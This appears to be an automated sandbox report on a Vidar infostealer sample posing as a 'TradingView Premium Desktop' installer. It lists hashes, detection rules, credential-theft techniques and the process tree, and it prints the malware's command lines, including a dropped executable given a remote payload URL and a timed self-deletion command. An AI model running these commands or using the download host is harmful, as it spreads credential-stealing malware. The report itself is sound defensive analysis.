Analysis
-
max time kernel
38s -
max time network
42s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-10-2024 10:32
Static task
static1
Behavioral task
behavioral1
Sample
TradingView Premium Desktop.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
TradingView Premium Desktop.exe
Resource
win10v2004-20241007-en
General
-
Target
TradingView Premium Desktop.exe
-
Size
780.2MB
-
MD5
670113fe6bf7fbcd6006f0d04d3daa72
-
SHA1
9ca0920c3e73e08c7c585398bdb0756f0fa0f5ae
-
SHA256
437351bc383d4274bc279d699eabdad546d6d68760bf04372a0c0430ad0ca41b
-
SHA512
e5a2b925dde644a2d69c6b4dd763f2ca1be778d754431a4b27fe093f230234f18f3ef8b92060e9b290f31e4d59ea33215c803064b6a1db33195f654516cfffd9
-
SSDEEP
196608:Raed/aHefyyj4OfTL7SSGnh/Q7cq2hKSIv3/5DLz:Raw/akxH7O/CoKPx
Malware Config
Signatures
-
Detect Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/3384-9-0x00000000006F0000-0x0000000001A49000-memory.dmp family_vidar_v7 behavioral2/memory/3384-44-0x00000000006F0000-0x0000000001A49000-memory.dmp family_vidar_v7 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation DGCGDB.exe -
Executes dropped EXE 11 IoCs
pid Process 1992 DGCGDB.exe 552 DGCGDB.exe 1596 DGCGDB.exe 4976 DGCGDB.exe 2952 DGCGDB.exe 3512 DGCGDB.exe 1704 DGCGDB.exe 1416 DGCGDB.exe 3980 DGCGDB.exe 2776 DGCGDB.exe 5056 DGCGDB.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TradingView Premium Desktop.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 TradingView Premium Desktop.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString TradingView Premium Desktop.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1136 timeout.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 3384 TradingView Premium Desktop.exe 3384 TradingView Premium Desktop.exe 3384 TradingView Premium Desktop.exe 3384 TradingView Premium Desktop.exe 3384 TradingView Premium Desktop.exe 3384 TradingView Premium Desktop.exe 3384 TradingView Premium Desktop.exe 3384 TradingView Premium Desktop.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 3384 wrote to memory of 1992 3384 TradingView Premium Desktop.exe 104 PID 3384 wrote to memory of 1992 3384 TradingView Premium Desktop.exe 104 PID 1992 wrote to memory of 552 1992 DGCGDB.exe 106 PID 1992 wrote to memory of 552 1992 DGCGDB.exe 106 PID 1992 wrote to memory of 1596 1992 DGCGDB.exe 107 PID 1992 wrote to memory of 1596 1992 DGCGDB.exe 107 PID 1992 wrote to memory of 4976 1992 DGCGDB.exe 108 PID 1992 wrote to memory of 4976 1992 DGCGDB.exe 108 PID 1992 wrote to memory of 2952 1992 DGCGDB.exe 109 PID 1992 wrote to memory of 2952 1992 DGCGDB.exe 109 PID 1992 wrote to memory of 3512 1992 DGCGDB.exe 110 PID 1992 wrote to memory of 3512 1992 DGCGDB.exe 110 PID 1992 wrote to memory of 1704 1992 DGCGDB.exe 111 PID 1992 wrote to memory of 1704 1992 DGCGDB.exe 111 PID 1992 wrote to memory of 1416 1992 DGCGDB.exe 112 PID 1992 wrote to memory of 1416 1992 DGCGDB.exe 112 PID 1992 wrote to memory of 3980 1992 DGCGDB.exe 113 PID 1992 wrote to memory of 3980 1992 DGCGDB.exe 113 PID 1992 wrote to memory of 2776 1992 DGCGDB.exe 114 PID 1992 wrote to memory of 2776 1992 DGCGDB.exe 114 PID 1992 wrote to memory of 5056 1992 DGCGDB.exe 115 PID 1992 wrote to memory of 5056 1992 DGCGDB.exe 115 PID 1992 wrote to memory of 4564 1992 DGCGDB.exe 116 PID 1992 wrote to memory of 4564 1992 DGCGDB.exe 116 PID 4564 wrote to memory of 1136 4564 cmd.exe 118 PID 4564 wrote to memory of 1136 4564 cmd.exe 118
Processes
-
C:\Users\Admin\AppData\Local\Temp\TradingView Premium Desktop.exe"C:\Users\Admin\AppData\Local\Temp\TradingView Premium Desktop.exe"1⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\ProgramData\DGCGDB.exeC:\ProgramData\\DGCGDB.exe https://apklight.com/clips.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\ProgramData\DGCGDB.exeC:\ProgramData\DGCGDB.exe3⤵
- Executes dropped EXE
PID:552
-
-
C:\ProgramData\DGCGDB.exeC:\ProgramData\DGCGDB.exe3⤵
- Executes dropped EXE
PID:1596
-
-
C:\ProgramData\DGCGDB.exeC:\ProgramData\DGCGDB.exe3⤵
- Executes dropped EXE
PID:4976
-
-
C:\ProgramData\DGCGDB.exeC:\ProgramData\DGCGDB.exe3⤵
- Executes dropped EXE
PID:2952
-
-
C:\ProgramData\DGCGDB.exeC:\ProgramData\DGCGDB.exe3⤵
- Executes dropped EXE
PID:3512
-
-
C:\ProgramData\DGCGDB.exeC:\ProgramData\DGCGDB.exe3⤵
- Executes dropped EXE
PID:1704
-
-
C:\ProgramData\DGCGDB.exeC:\ProgramData\DGCGDB.exe3⤵
- Executes dropped EXE
PID:1416
-
-
C:\ProgramData\DGCGDB.exeC:\ProgramData\DGCGDB.exe3⤵
- Executes dropped EXE
PID:3980
-
-
C:\ProgramData\DGCGDB.exeC:\ProgramData\DGCGDB.exe3⤵
- Executes dropped EXE
PID:2776
-
-
C:\ProgramData\DGCGDB.exeC:\ProgramData\DGCGDB.exe3⤵
- Executes dropped EXE
PID:5056
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\ProgramData\DGCGDB.exe" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\system32\timeout.exetimeout /t 104⤵
- Delays execution with timeout.exe
PID:1136
-
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
4Credentials In Files
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD51fbd01ee768b7c4abfd2783a4707a072
SHA115288415ec755c2673da3c716386abfdd35aaaed
SHA2560a6b558dc092b4f6bce802a6407fe468f7b973c82db36e2d7a0d0db5635838b4
SHA512200e9ddc345d9a9014e4b8db1db4647ab247491de20deea02ee65a032f62c67cf46fa46fff19b2e2059ba9274a24d9ad12c55b14af9da2ccfb355a40875a8c5d
-
Filesize
3.2MB
MD5591e2268cf72d349e9b46eddeb65db1e
SHA1682f4e6840ff963a142e551a9ffc522a50826d61
SHA256b94f9fa3f084671c30fd0f2c660d580046a480a8ae2790d6da29ab092973d36b
SHA512f3a537dd310c41f491589d90dc18e97bff5bb16358ccce104ba1fd10d6c026dcddc955c65a19b269fe3a88d0b6cff94e71a68300107278b152c0b831e4c34567